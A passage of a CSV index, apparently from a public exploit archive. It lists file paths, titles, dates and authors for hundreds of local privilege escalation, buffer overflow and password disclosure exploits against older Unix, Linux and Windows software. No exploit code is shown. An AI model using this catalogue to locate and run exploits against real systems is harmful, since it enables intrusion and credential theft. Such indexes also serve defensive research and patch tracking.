Privilege Escalation",2001-01-12,caddis,bsd,local, -245,exploits/hp-ux/local/245.c,"HP-UX 11.0 - '/bin/cu' Local Privilege Escalation",2001-01-13,zorgon,hp-ux,local, -247,exploits/solaris/local/247.c,"Solaris 2.5/2.5.1 - 'getgrnam()' Local Overflow",2001-01-13,"Pablo Sor",solaris,local, -249,exploits/linux/local/249.c,"GLIBC locale - Format Strings",2003-01-15,logikal,linux,local, -250,exploits/solaris/local/250.c,"Solaris 7/8-beta - ARP Local Overflow",2001-01-15,ahmed,solaris,local, -252,exploits/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Local Overflow",2001-01-15,teleh0r,linux,local, -255,exploits/linux/local/255.pl,"RedHat 6.1 - 'man' Local Overflow / Privilege Escalation",2001-01-19,teleh0r,linux,local, -256,exploits/solaris/local/256.c,"Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",solaris,local, -257,exploits/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,linux,local, -258,exploits/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read",2001-01-25,krochos,linux,local, -259,exploits/tru64/local/259.c,"Tru64 5 - 'su' Env Local Stack Overflow",2001-01-26,K2,tru64,local, -260,exploits/linux/local/260.c,"splitvt < 1.6.5 - Local Overflow",2001-01-26,"Michel Kaempf",linux,local, -261,exploits/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,sco,local, -265,exploits/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation",2001-05-07,LSD-PLaNET,irix,local, -270,exploits/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation",2001-05-08,LSD-PLaNET,irix,local, -271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local, -272,exploits/windows/local/272.c,"WinZip - MIME Parsing Overflow (PoC)",2004-04-15,snooq,windows,local, -273,exploits/linux/local/273.c,"SquirrelMail - 'chpasswd' Local Buffer Overflow",2004-04-20,x314,linux,local, -281,exploits/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Local Privilege Escalation",2001-03-02,"Cody Tubbs",tru64,local, -285,exploits/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local Privilege Escalation",2001-03-03,kengz,linux,local, -286,exploits/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Local Privilege Escalation",2001-03-03,dethy,bsd,local, -287,exploits/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Local Privilege Escalation",2001-03-03,dethy,bsd,local, -288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",multiple,local, -290,exploits/linux/local/290.tcsh,"GLIBC 2.1.3 - 'LD_PRELOAD' Local Privilege Escalation",2001-03-04,Shadow,linux,local, -302,exploits/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local, -317,exploits/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution",1996-01-01,"Jared Mauch",linux,local, -319,exploits/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local, -320,exploits/linux/local/320.pl,"suid_perl 5.001 - Command Execution",1996-06-01,"Jon Lewis",linux,local, -321,exploits/multiple/local/321.c,"BSD / Linux - 'umount' Local Privilege Escalation",1996-08-13,bloodmask,multiple,local, -322,exploits/linux/local/322.c,"Xt Library - Local Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local, -325,exploits/linux/local/325.c,"BSD / Linux - 'lpr' Local Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local, -328,exploits/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local, -330,exploits/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink",1997-05-03,"Chris Sheldon",solaris,local, -331,exploits/linux/local/331.c,"LibXt - 'XtAppInitialize()' Local Overflow *xterm",1997-05-14,"Ming Zhang",linux,local, -332,exploits/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer",1997-05-19,"Joe Zbiciak",solaris,local, -333,exploits/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",aix,local, -334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,irix,local, -335,exploits/aix/local/335.c,"AIX lquerylv - Local Buffer Overflow / Privilege Escalation",1997-05-26,"Georgi Guninski",aix,local, -336,exploits/irix/local/336.c,"SGI IRIX - '/bin/login' Local Buffer Overflow",1997-05-26,"David Hedley",irix,local, -337,exploits/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Privilege Escalation",1997-05-27,"David Hedley",irix,local, -338,exploits/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm '-xrm' Local Privilege Escalation",1997-05-28,"David Hedley",solaris,local, -339,exploits/linux/local/339.c,"zgv - '$HOME' Local Buffer Overflow",1997-06-20,"BeastMaster V",linux,local, -341,exploits/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Local Overflow",1997-07-12,"Cristian Schipor",solaris,local, -350,exploits/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local, -351,exploits/windows/local/351.c,"Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,windows,local, -352,exploits/windows/local/352.c,"Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)",2004-07-17,kralor,windows,local, -353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,windows,local, -355,exploits/windows/local/355.c,"Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)",2004-07-20,kralor,windows,local, -367,exploits/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local, -368,exploits/windows/local/368.c,"Microsoft Windows XP - Task Scheduler '.job' Universal (MS04-022)",2004-07-31,houseofdabus,windows,local, -369,exploits/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",linux,local, -374,exploits/linux/local/374.c,"SoX - '.wav' Local Buffer Overflow",2004-08-04,Rave,linux,local, -375,exploits/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure",2004-08-04,"Paul Starzetz",linux,local, -381,exploits/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Local Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local, -388,exploits/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local, -393,exploits/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local, -394,exploits/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow",2004-08-13,pi3,linux,local, -395,exploits/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Overflow",2004-08-14,mandragore,windows,local, -396,exploits/bsd/local/396.c,"OpenBSD - 'ftp' Local Overflow",2002-01-01,Teso,bsd,local, -401,exploits/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local, -405,exploits/linux/local/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,local, -411,exploits/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Local Privilege Escalation",2001-01-01,sd,linux,local, -417,exploits/linux/local/417.c,"SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)",2004-08-25,Bytes,linux,local, -434,exploits/linux/local/434.sh,"CDRDAO - Local Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local, -438,exploits/linux/local/438.c,"CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local, -466,exploits/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Overflow",2004-09-16,"Luiz Fernando Camargo",linux,local, -469,exploits/linux/local/469.c,"CDRecord's ReadCD - Local Privilege Escalation",2004-09-19,"Max Vozeler",linux,local, -470,exploits/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission",2004-09-21,"Angelo Rosiello",linux,local, -476,exploits/linux/local/476.c,"glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow (PoC)",2004-09-23,CoKi,linux,local, -479,exploits/linux/local/479.c,"GNU Sharutils 4.2.1 - Local Format String (PoC)",2004-09-25,n4rk0tix,linux,local, -482,exploits/hp-ux/local/482.c,"HP-UX 11.0/11.11 - swxxx Privilege Escalation",2002-12-11,watercloud,hp-ux,local, -558,exploits/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,windows,local, -559,exploits/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local, -560,exploits/windows/local/560.txt,"GlobalScape - CuteFTP macros '.mcr' Local File Write",2004-09-28,ATmaCA,windows,local, -579,exploits/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local acls Bypass",2004-10-16,"Idan Nahoum",bsd,local, -586,exploits/linux/local/586.c,"BitchX 1.0c19 - Local Privilege Escalation",2004-10-20,Sha0,linux,local, -587,exploits/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local, -591,exploits/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,linux,local, -600,exploits/linux/local/600.c,"GD Graphics Library - Local Heap Overflow (PoC)",2004-10-26,anonymous,linux,local, -601,exploits/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local, -602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon Valle",sco,local, -624,exploits/linux/local/624.c,"Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read",2004-11-10,"Paul Starzetz",linux,local, -629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,multiple,local, -657,exploits/linux/local/657.c,"atari800 - Local Privilege Escalation",2004-11-25,pi3,linux,local, -669,exploits/linux/local/669.c,"Aspell (word-list-compress) - Command Line Stack Overflow",2004-12-01,c0d3r,linux,local, -680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local, -684,exploits/linux/local/684.c,"TipxD 1.1.1 - Not SETUID Local Format String",2004-12-14,CoKi,linux,local, -694,exploits/windows/local/694.c,"WinRAR 3.4.1 - Corrupt '.ZIP' File (PoC)",2004-12-16,"Vafa Khoshaein",windows,local, -695,exploits/linux/local/695.c,"Cscope 15.5 - Symlink",2004-12-17,Gangstuck,linux,local, -698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local, -699,exploits/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,aix,local, -701,exploits/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation",2004-12-21,cees-bart,aix,local, -713,exploits/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local, -714,exploits/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local, -715,exploits/solaris/local/715.c,"Solaris 8/9 passwd - 'circ()' Local Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local, -718,exploits/linux/local/718.c,"Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local, -739,exploits/bsd/local/739.c,"FreeBSD - '/usr/bin/top' Format String",2001-07-23,truefinder,bsd,local, -741,exploits/linux/local/741.pl,"HTGET 0.9.x - Local Privilege Escalation",2005-01-05,nekd0,linux,local, -744,exploits/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local, -749,exploits/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Privilege Escalation",2005-01-11,"Cesar Cerrudo",windows,local, -756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local (PoC)",2005-01-15,"Rafael Carrasco",linux,local, -758,exploits/osx/local/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,osx,local, -760,exploits/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper",2005-01-16,ATmaCA,windows,local, -763,exploits/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility",2005-01-20,vade79,linux,local,79 -766,exploits/osx/local/766.c,"Apple Mac OSX 10.3.7 - 'mRouter' Local Privilege Escalation",2005-01-22,nemo,osx,local, -769,exploits/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow",2005-01-24,ATmaCA,windows,local, -776,exploits/linux/local/776.c,"Mandrake / Slackware /usr/bin/trn - Local Privilege Escalation (Not SUID)",2005-01-26,ZzagorR,linux,local, -778,exploits/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Local Privilege Escalation (2)",2005-01-27,"Tim Hsu",linux,local, -779,exploits/linux/local/779.sh,"ncpfs < 2.2.6 (Gentoo / Linux) - Local Privilege Escalation",2005-01-30,super,linux,local, -788,exploits/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Local Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local, -791,exploits/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Local Overflow",2005-02-07,"Kevin Finisterre",linux,local, -792,exploits/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local, -793,exploits/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local, -795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local, -796,exploits/linux/local/796.sh,"Exim 4.42 - Local Privilege Escalation",2005-02-07,darkeagle,linux,local, -798,exploits/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local, -803,exploits/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users",2005-02-09,Kozan,windows,local, -811,exploits/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Credential Recover",2005-02-10,Kozan,windows,local, -816,exploits/linux/local/816.c,"GNU a2ps - Anything to PostScript Not SUID Local Overflow",2005-02-13,lizard,linux,local, -824,exploits/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Non SUID Local Shell",2005-09-13,Qnix,linux,local, -833,exploits/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure",2005-02-22,Kozan,windows,local, -834,exploits/windows/local/834.c,"eXeem 0.21 - Local Password Disclosure",2005-02-22,Kozan,windows,local, -835,exploits/windows/local/835.c,"SendLink 1.5 - Local Password Disclosure",2005-02-22,Kozan,windows,local, -836,exploits/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure",2005-02-23,Kozan,windows,local, -837,exploits/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure",2005-02-23,Kozan,windows,local, -839,exploits/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",windows,local, -844,exploits/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure (ASM)",2005-02-26,illwill,windows,local, -846,exploits/windows/local/846.cpp,"Einstein 1.01 - Local Password Disclosure",2005-02-27,Kozan,windows,local, -848,exploits/windows/local/848.asm,"Einstein 1.01 - Local Password Disclosure (ASM)",2005-02-28,illwill,windows,local, -863,exploits/windows/local/863.cpp,"RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow",2005-03-07,nolimit,windows,local, -876,exploits/linux/local/876.c,"PaX - Double-Mirrored VMA munmap Privilege Escalation",2005-03-14,"Christophe Devine",linux,local, -877,exploits/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow",2005-03-14,"Kevin Finisterre",linux,local, -884,exploits/windows/local/884.cpp,"iSnooker 1.6.8 - Local Password Disclosure",2005-03-16,Kozan,windows,local, -885,exploits/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure",2005-03-16,Kozan,windows,local, -890,exploits/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,linux,local, -895,exploits/linux/local/895.c,"Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)",2005-03-22,sd,linux,local, -896,exploits/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Privilege Escalation",2005-03-22,vade79,osx,local, -898,exploits/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,aix,local, -905,exploits/windows/local/905.c,"BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow",2005-04-01,class101,windows,local, -912,exploits/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Licence Recover",2005-04-04,Kozan,windows,local, -913,exploits/linux/local/913.pl,"Aeon 0.2a - Local Linux (1)",2005-04-05,lammat,linux,local, -914,exploits/linux/local/914.c,"Aeon 0.2a - Local Linux (2)",2005-04-05,patr0n,linux,local, -918,exploits/windows/local/918.c,"FTP Now 2.6.14 - Local Password Disclosure",2005-04-06,Kozan,windows,local, -919,exploits/windows/local/919.c,"FireFly 1.0 - Local Proxy Password Disclosure",2005-04-07,Kozan,windows,local, -920,exploits/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure",2005-04-07,Kozan,windows,local, -924,exploits/linux/local/924.c,"sash 3.7 - Local Buffer Overflow",2005-04-08,lammat,linux,local, -926,exploits/linux/local/926.c,"Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)",2005-10-26,qobaiashi,linux,local, -927,exploits/windows/local/927.c,"Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow",2005-04-11,"Stuart Pearson",windows,local, -929,exploits/windows/local/929.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell (1)",2005-04-12,"Tal Zeltzer",windows,local, -932,exploits/windows/local/932.sql,"Oracle Database Server 10.1.0.2 - Local Buffer Overflow",2005-04-13,"Esteban Fayo",windows,local, -933,exploits/windows/local/933.sql,"Oracle Database PL/SQL Statement - Multiple SQL Injections s",2005-04-13,"Esteban Fayo",windows,local, -935,exploits/windows/local/935.c,"Morpheus 4.8 - Local Chat Passwords Disclosure",2005-04-13,Kozan,windows,local, -936,exploits/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure",2005-04-13,Kozan,windows,local, -937,exploits/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure",2005-04-13,Kozan,windows,local, -938,exploits/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution (MS05-016)",2005-04-14,ZwelL,windows,local, -950,exploits/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow",2005-04-21,sk,linux,local, -951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2)",2005-04-22,"Jean Luc",windows,local, -963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,windows,local, -964,exploits/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure",2005-04-28,Kozan,windows,local, -965,exploits/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure",2005-04-28,Kozan,windows,local, -966,exploits/windows/local/966.c,"NotJustBrowsing 1.0.3 - Local Password Disclosure",2005-04-28,Kozan,windows,local, -971,exploits/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Local Privilege Escalation",2005-04-29,"Jerome Athias",windows,local, -972,exploits/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Format String Privilege Escalation",2005-04-30,"Kevin Finisterre",solaris,local, -973,exploits/linux/local/973.c,"ARPUS/Ce - Local File Overwrite (setuid)",2005-05-01,"Kevin Finisterre",linux,local, -974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid) (Perl)",2005-05-01,"Kevin Finisterre",linux,local, -997,exploits/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Local Privilege Escalation",2005-05-17,newbug,linux,local, -1001,exploits/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition",2005-05-19,watercloud,aix,local, -1009,exploits/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Read Emails",2005-05-25,Plugger,linux,local, -1019,exploits/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local, -1029,exploits/linux/local/1029.c,"ePSXe 1.6.0 - 'nogui()' Local Privilege Escalation",2005-06-04,Qnix,linux,local, -1032,exploits/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Local Privilege Escalation",2005-06-07,"Ilya Rabinovich",windows,local, -1034,exploits/windows/local/1034.cpp,"WinZip 8.1 - Command Line Local Buffer Overflow",2005-06-07,ATmaCA,windows,local, -1043,exploits/osx/local/1043.c,"Apple Mac OSX 10.4 - launchd Race Condition",2005-06-14,intropy,osx,local, -1044,exploits/aix/local/1044.c,"AIX 5.2 - 'netpmon' Local Privilege Escalation",2005-06-14,intropy,aix,local, -1045,exploits/aix/local/1045.c,"AIX 5.2 - 'ipl_varyon' Local Privilege Escalation",2005-06-14,intropy,aix,local, -1046,exploits/aix/local/1046.c,"AIX 5.2 - 'paginit' Local Privilege Escalation",2005-06-14,intropy,aix,local, -1073,exploits/solaris/local/1073.c,"Solaris 9/10 - 'ld.so' Local Privilege Escalation (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local, -1074,exploits/solaris/local/1074.c,"Solaris 9/10 - 'ld.so' Local Privilege Escalation (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local, -1085,exploits/windows/local/1085.c,"Willing Webcam 2.8 - Licence Information Disclosure",2005-07-04,Kozan,windows,local, -1086,exploits/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure",2005-07-04,Kozan,windows,local, -1087,exploits/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation",2005-07-04,RusH,bsd,local, -1091,exploits/windows/local/1091.c,"Internet Download Manager 4.0.5 - Input URL Stack Overflow",2005-07-06,c0d3r,windows,local, -1092,exploits/solaris/local/1092.c,"Solaris (SPARC/x86) - Local Socket Hijack",2005-07-06,c0ntex,solaris,local, -1119,exploits/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - 'modlines' Local Command Execution",2005-07-25,"Georgi Guninski",multiple,local, -1128,exploits/windows/local/1128.c,"Microsoft Windows - 'LegitCheckControl.dll' Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local, -1154,exploits/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Privilege Escalation",2005-08-16,"Charles Stevenson",linux,local, -1161,exploits/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation",2005-04-27,"Reed Arvin",windows,local, -1168,exploits/windows/local/1168.c,"WinAce 2.6.0.5 - Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,windows,local, -1170,exploits/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup - Local Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local, -1173,exploits/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,windows,local, -1174,exploits/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,windows,local, -1181,exploits/linux/local/1181.c,"MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1)",2004-12-24,"Marco Ivaldi",linux,local, -1182,exploits/solaris/local/1182.c,"Solaris 2.6/7/8/9 (SPARC) - 'ld.so.1' Local Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local, -1185,exploits/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Local Privilege Escalation",2005-08-30,vade79,osx,local, -1186,exploits/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Local Privilege Escalation",2005-08-30,vade79,osx,local, -1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local, -1197,exploits/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Escalation",2005-09-06,"Andrés Acunha",windows,local, -1198,exploits/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local, -1215,exploits/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Local Privilege Escalation",2005-09-14,Qnix,linux,local, -1229,exploits/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Local Privilege Escalation",2005-09-24,kingcope,linux,local, -1230,exploits/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - Local Privilege Escalation",2005-09-24,kingcope,bsd,local, -1248,exploits/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local, -1267,exploits/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow / Privilege Escalation",2005-10-20,qaaz,linux,local, -1297,exploits/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local, -1299,exploits/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Local Privilege Escalation",2005-11-08,Hunger,linux,local, -1300,exploits/linux/local/1300.sh,"Operator Shell (OSH) 1.7-14 - Local Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local, -1310,exploits/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local, -1311,exploits/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure",2005-11-09,kingcope,bsd,local, -1316,exploits/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local, -1347,exploits/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local, -1360,exploits/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Overflow",2005-12-07,c0ntex,solaris,local, -1397,exploits/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation",2005-12-30,alert7,linux,local, -1402,exploits/sco/local/1402.c,"SCO OpenServer 5.0.7 - 'termsh' Local Privilege Escalation",2006-01-03,prdelka,sco,local, -1403,exploits/windows/local/1403.c,"WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)",2006-01-04,K4P0,windows,local, -1404,exploits/windows/local/1404.c,"WinRAR 3.30 - 'Filename' Local Buffer Overflow (2)",2006-01-04,c0d3r,windows,local, -1406,exploits/windows/local/1406.php,"PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow",2006-01-05,mercenary,windows,local, -1407,exploits/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)",2006-01-05,SoBeIt,windows,local, -1412,exploits/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,linux,local, -1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,linux,local, -1425,exploits/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,linux,local, -1445,exploits/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",linux,local, -1449,exploits/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow",2006-01-25,"rod hedor",linux,local, -1455,exploits/windows/local/1455.txt,"Oracle Database Server 9i/10g - 'XML' Local Buffer Overflow",2006-01-26,Argeniss,windows,local, -1465,exploits/windows/local/1465.c,"Microsoft Windows - ACLs Privilege Escalation (2)",2006-02-12,"Andres Tarasco",windows,local, -1470,exploits/windows/local/1470.c,"Microsoft HTML Help 